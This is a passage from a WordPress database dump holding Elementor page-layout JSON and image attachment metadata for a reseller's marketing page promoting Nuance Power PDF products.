Acrobat is a good business decision.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"557fab3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f6ebfee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6446727\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/box-power-pdf-standard3-left-250x230-en-us.png\",\"id\":2775}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"784ad11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Power PDF Standard<\\/h3><h4>Fast and accurate conversion and editing<\\/h4><p>Most accurate PDF to Word or Excel conversions of any PDF solution<\\/p><p>Combine, edit, assemble, fill forms and share PDF files<\\/p><p>Scan paper to PDF and create Searchable PDF files<\\/p><p>Easy-to-use Office-style interface with clear and accessible tools<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1da2552\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0c9ca96\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/box-power-pdf-advanced3-left-250x230-en-us.png\",\"id\":2776}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8271839\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Power PDF Advanced<\\/h3><h4>For enhanced security, signing and collaboration<\\/h4><p>Includes all the features of Power PDF Standard as well as additional features for connectivity, collaboration, security and redaction<\\/p><p>Sign and send PDFs for signature with DocuSign\\u00ae<\\/p><p>Real time collaboration lets multiple people work on the same document, at the same time, over a network<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5dc247\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d4617f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/icon-img-power-pdf.png\",\"id\":2777}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"df77d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Power PDF Advanced: Volume Licensing<\\/h3><h4>Enterprise deployment with a single license to manage<\\/h4><p>Reasonable cost of ownership with fewer products to manage and expert customer support<\\/p><p>Capture budget savings on licensing<\\/p><p>Superior IT management with flexible and customizable deployment options<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"df9ce51\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5ebb69bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d540be4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Nuance<\\/h3>\\r\\n<h3>Print, capture &amp; PDF solutions<\\/h3>\\r\\n<h3>Gain control of your documents<\\/h3>\\r\\nNuance document imaging solutions keep your organization\'s most vital information private.\\r\\n<h3>Uncontrolled MFPs and printers pose a significant risk of sensitive information exposure<\\/h3>\\r\\nPrint and scan securely with Nuance solutions.\\r\\n<h4>Industry compliance<\\/h4>\\r\\nNuance software solutions enable strict compliance with industry regulations, minimizing risk while maximizing confidence in your document workflows and business processes.\\r\\n<h4>Seamless integration<\\/h4>\\r\\nNuance integrated document process solutions offer cross-platform compatibility for seamless deployment to your MFPs, printers, scanners, and enterprise systems.\\r\\n<h4>Workflow management<\\/h4>\\r\\nMakeshift processes put critical data at risk. Nuance helps you gain complete control of your document workflows with powerful solutions built for your industry.\\r\\n\\r\\n<hr \\/>\\r\\n\\r\\n<h3>A comprehensive portfolio for managing your documents<\\/h3>\\r\\n<h4>Print management<\\/h4>\\r\\nDiscover a range of powerful capabilities that can help your organization better manage printing processes.\\r\\n<h4>Document capture &amp; workflow<\\/h4>\\r\\nRe-imagine your company\\u2019s document capture workflows with our intelligent solutions.\\r\\n<h4>Mobile Document Imaging<\\/h4>\\r\\nSee how Business Connect makes it easy to fully manage, integrate, and extend business processes to your highly mobile workforce.\\r\\n<h4>PDF &amp; document conversion<\\/h4>\\r\\nLearn how Nuance combines intuitive design and innovative features to help your team be more productive.\\r\\n<h4>Cost recovery<\\/h4>\\r\\nGet a more accurate view of your entire business so you can more easily recover costs and manage print expenses.\\r\\n\\r\\n&nbsp;\\r\\n\\r\\n[maxbutton id=\\\"1\\\" ]\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4659,2780,'_elementor_data','[{\"id\":\"7d14c46\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ea455dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c4f6563\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Gain control of your PDFs<\\/h3><p>From the leader in secure document workflows, Nuance\\u00ae Power PDF is the ultimate PDF solution. Perfect for the individual or the enterprise, it\\u2019s simply the best way to gain control over PDF files. Power PDF provides superior accuracy, industry standard PDF compatibility and is exceptionally easy to use.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a3dbb32\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"04d5637\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/KJ7-lKGvGQg\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"badba73\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a153814\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5ee6fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"The right PDF solution for every need\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5e4e770\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7fcc8d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"09a34fb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Create and convert<\\/h3><p>Power PDF is the fastest, most accurate PDF solution available.<br \\/>It faithfully reproduces complex layouts from PDFs or scanned documents in editable formats \\u2013 even those with columns, tables and graphics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"51f6125\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"824571a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Edit and combine<\\/h3><p>Quickly touch up and edit text and images in PDF files. Power PDF word processing like capabilities sets it apart in ease-of-use.<br \\/>Assemble and organize PDFs with intuitive drag-and-drop tools.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8cdb5b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87b78e1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Sign and collaborate<\\/h3><p>Power PDF Advanced streamlines document reviews, signing and collaborating.<br \\/>It offers integrated DocuSign\\u00ae capabilities, fillable forms, and real-time local network collaboration.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fbca78f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"822f2c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7966f80\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>There are many options today, but only one makes sense: Nuance Power PDF<\\/h4><p>Power PDF provides the ease of use and the advanced functionality to do the job correctly\\u2014at a price that makes sense. See why switching from Adobe Acrobat is a good business decision.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"557fab3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f6ebfee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6446727\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/box-power-pdf-standard3-left-250x230-en-us.png\",\"id\":2775}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"784ad11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Power PDF Standard<\\/h3><h4>Fast and accurate conversion and editing<\\/h4><p>Most accurate PDF to Word or Excel conversions of any PDF solution<\\/p><p>Combine, edit, assemble, fill forms and share PDF files<\\/p><p>Scan paper to PDF and create Searchable PDF files<\\/p><p>Easy-to-use Office-style interface with clear and accessible tools<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1da2552\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0c9ca96\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/box-power-pdf-advanced3-left-250x230-en-us.png\",\"id\":2776}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8271839\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Power PDF Advanced<\\/h3><h4>For enhanced security, signing and collaboration<\\/h4><p>Includes all the features of Power PDF Standard as well as additional features for connectivity, collaboration, security and redaction<\\/p><p>Sign and send PDFs for signature with DocuSign\\u00ae<\\/p><p>Real time collaboration lets multiple people work on the same document, at the same time, over a network<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5dc247\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d4617f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/icon-img-power-pdf.png\",\"id\":2777}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"df77d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Power PDF Advanced: Volume Licensing<\\/h3><h4>Enterprise deployment with a single license to manage<\\/h4><p>Reasonable cost of ownership with fewer products to manage and expert customer support<\\/p><p>Capture budget savings on licensing<\\/p><p>Superior IT management with flexible and customizable deployment options<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4633,2775,'_wp_attached_file','2019/01/box-power-pdf-standard3-left-250x230-en-us.png'),(4634,2775,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:250;s:6:\"height\";i:230;s:4:\"file\";s:54:\"2019/01/box-power-pdf-standard3-left-250x230-en-us.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:54:\"box-power-pdf-standard3-left-250x230-en-us-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:54:\"box-power-pdf-standard3-left-250x230-en-us-250x150.png\";s:5:\"width\";i:250;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:52:\"box-power-pdf-standard3-left-250x230-en-us-20x18.png\";s:5:\"width\";i:20;s:6:\"height\";i:18;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4635,2775,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.955752212389381128332388470880687236785888671875;s:5:\"bytes\";i:3960;s:11:\"size_before\";i:39776;s:10:\"size_after\";i:35816;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:2:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:1890;s:11:\"size_before\";i:17150;s:10:\"size_after\";i:15260;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.1500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:2070;s:11:\"size_before\";i:22626;s:10:\"size_after\";i:20556;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}}}'),(4636,2776,'_wp_attached_file','2019/01/box-power-pdf-advanced3-left-250x230-en-us.png'),(4637,2776,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:250;s:6:\"height\";i:230;s:4:\"file\";s:54:\"2019/01/box-power-pdf-advanced3-left-250x230-en-us.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:54:\"box-power-pdf-advanced3-left-250x230-en-us-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:54:\"box-power-pdf-advanced3-left-250x230-en-us-250x150.png\";s:5:\"width\";i:250;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:52:\"box-power-pdf-advanced3-left-250x230-en-us-20x18.png\";s:5:\"width\";i:20;s:6:\"height\";i:18;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4638,2776,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:11.1879962123971150589341050363145768642425537109375;s:5:\"bytes\";i:4608;s:11:\"size_before\";i:41187;s:10:\"size_after\";i:36579;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:2:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:1672;s:11:\"size_before\";i:17231;s:10:\"size_after\";i:15559;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.2599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:2936;s:11:\"size_before\";i:23956;s:10:\"size_after\";i:21020;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}}}'),(4639,2777,'_wp_attached_file','2019/01/icon-img-power-pdf.png'),(4640,2777,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:210;s:6:\"height\";i:230;s:4:\"file\";s:30:\"2019/01/icon-img-power-pdf.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"icon-img-power-pdf-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:30:\"icon-img-power-pdf-210x150.png\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:28:\"icon-img-power-pdf-18x20.png\";s:5:\"width\";i:18;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4641,2777,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:34.0106368471294189248510519973933696746826171875;s:5:\"bytes\";i:2494;s:11:\"size_before\";i:7333;s:10:\"size_after\";i:4839;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:2:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:35.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:1851;s:11:\"size_before\";i:5224;s:10:\"size_after\";i:3373;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:30.489999999999998436805981327779591083526611328125;s:5:\"bytes\";i:643;s:11:\"size_before\";i:2109;s:10:\"size_after\";i:1466;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}}}'),(4646,2778,'_elementor_version','0.4'),(4660,2780,'_elementor_version','0.4'),(4663,2781,'_wp_page_template','template-fullwidth.php'),(4664,2781,'_elementor_edit_mode','builder'),(4665,2781,'_elementor_template_type','post'),(4666,2781,'_elementor_data','[{\"id\":\"b48cde6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"de68660\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1feef6e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Leading the way in PDF productivity\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d14c46\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ea455dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c4f6563\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Gain control of your PDFs<\\/h3><p>From the leader in secure document workflows, Nuance\\u00ae Power PDF is the ultimate PDF solution. Perfect for the individual or the enterprise, it\\u2019s simply the best way to gain control over PDF files. Power PDF provides superior accuracy, industry standard PDF compatibility and is exceptionally easy to use.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a3dbb32\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"04d5637\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/KJ7-lKGvGQg\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"badba73\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a153814\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5ee6fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"The right PDF solution for every need\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5e4e770\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7fcc8d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"09a34fb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Create and convert<\\/h3><p>Power PDF is the fastest, most accurate PDF solution available.<br \\/>It faithfully reproduces complex layouts from PDFs or scanned documents in editable formats \\u2013 even those with columns, tables and graphics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"51f6125\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"824571a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Edit and combine<\\/h3><p>Quickly touch up and edit text and images in PDF files. Power PDF word processing like capabilities sets it apart in ease-of-use.<br \\/>Assemble and organize PDFs with intuitive drag-and-drop tools.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8cdb5b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87b78e1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Sign and collaborate<\\/h3><p>Power PDF Advanced streamlines document reviews, signing and collaborating.<br \\/>It offers integrated DocuSign\\u00ae capabilities, fillable forms, and real-time local network collaboration.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fbca78f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"822f2c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7966f80\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>There are many options today, but only one makes sense: Nuance Power PDF<\\/h4><p>Power PDF provides the ease of use and the advanced functionality to do the job correctly\\u2014at a price that makes sense. See why switching from Adobe Acrobat is a good business decision.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"557fab3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f6ebfee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6446727\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/box-power-pdf-standard3-left-250x230-en-us.png\",\"id\":2775}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"784ad11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Power PDF Standard<\\/h3><h4>Fast and accurate conversion and editing<\\/h4><p>Most accurate PDF to Word or Excel conversions of any PDF solution<\\/p><p>Combine, edit, assemble, fill forms and share PDF files<\\/p><p>Scan paper to PDF and create Searchable PDF files<\\/p><p>Easy-to-use Office-style interface with clear and accessible tools<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1da2552\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0c9ca96\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/box-power-pdf-advanced3-left-250x230-en-us.png\",\"id\":2776}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8271839\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Power PDF Advanced<\\/h3><h4>For enhanced security, signing and collaboration<\\/h4><p>Includes all the features of Power PDF Standard as well as additional features for connectivity, collaboration, security and redaction<\\/p><p>Sign and send PDFs for signature with DocuSign\\u00ae<\\/p><p>Real time collaboration lets multiple people work on the same document, at the same time, over a network<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5dc247\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d4617f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/01\\/icon-img-power-pdf.png\",\"id\":2777}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"df77d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Power PDF Advanced: Volume Licensing<\\/h3><h4>Enterprise deployment with a single license to manage<\\/h4><p>Reasonable cost of ownership with fewer products to manage and expert customer support<\\/p><p>Capture budget savings on licensing<\\/p><p>Superior IT management with flexible and customizable deployment options<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4667,2781,'_elementor_version','0.4'),(4670,2782,'_wp_page_template','template-fullwidth.php'),(4671,2782,'_elementor_edit_mode','builder'),(4672,2782,'_elementor_template_type','post'),(4673,2782,'_elementor_data','[{\"id\":\"b48cde6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"de68660\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1feef6e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Leading the way in PDF productivity\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d14c46\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ea455dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c4f6563\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Gain control of your PDFs<\\/h3><p>From the leader in secure document workflows, Nuance\\u00ae Power PDF is the ultimate PDF solution. Perfect for the individual or the enterprise, it\\u2019s simply the best way to gain control over PDF files. Power PDF provides superior accuracy, industry standard PDF compatibility and is exceptionally easy to use.<\\/p>\",\"align\":\"justify\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a3dbb32\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"04d5637\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/KJ7-lKGvGQg\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"badba73\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a153814\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5ee6fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"The right PDF solution for every need\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5e4e770\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7fcc8d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"09a34fb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Create and convert<\\/h3><p>Power PDF is the fastest, most accurate PDF solution available.<br \\/>It faithfully reproduces complex layouts from PDFs or scanned documents in editable formats \\u2013 even those with columns, tables and graphics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"51f6125\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"824571a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Edit and combine<\\/h3><p>Quickly touch up and edit text and images in PDF files. Power PDF word processing like capabilities sets it apart in ease-of-use.<br \\/>Assemble and organize PDFs with intuitive drag-and-drop tools.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8cdb5b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87b78e1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Sign and collaborate<\\/h3><p>Power PDF Advanced streamlines document reviews, signing and collaborating.<br \\/>It offers integrated DocuSign\\u00ae capabilities, fillable forms, and real-time local network 